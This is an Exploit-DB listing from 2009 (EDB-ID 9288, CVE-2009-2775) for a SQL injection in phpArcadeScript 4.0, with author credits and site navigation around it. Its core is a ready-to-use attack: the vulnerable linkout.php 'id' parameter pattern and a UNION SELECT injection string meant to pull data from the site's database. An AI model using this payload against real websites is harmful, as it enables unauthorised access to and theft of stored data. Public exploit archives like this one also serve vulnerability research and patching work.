phpArcadeScript 4.0 - 'id' SQL Injection

EDB-ID:

9288

CVE:

2009-2775

EDB Verified:

Author:

MizoZ

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-07-28

Vulnerable App:

----------------------------------------------------------------------------------------------------
  Name : PHP AS v4
  Site : http://www.phparcadescript.com/

----------------------------------------------------------------------------------------------------
 
  Found By : MizoZ [EvilWay Team]
  Made in  : Morocco
  Contact  : mizoz[at]9[dot]cn
  Greetz   : Moudi , Zuka , JIKO , opt!x , All friends
  Website : BlackArea.org (Coming Soon)
----------------------------------------------------------------------------------------------------

SQL Injection linkout.php (GET : id) :
[HOST]/[PATH]/linkout.php?id=[SQL CODE]

SQL CODE : null+union+select+1,2,3,4,5,6,7,8,9,10,11--

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-28]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services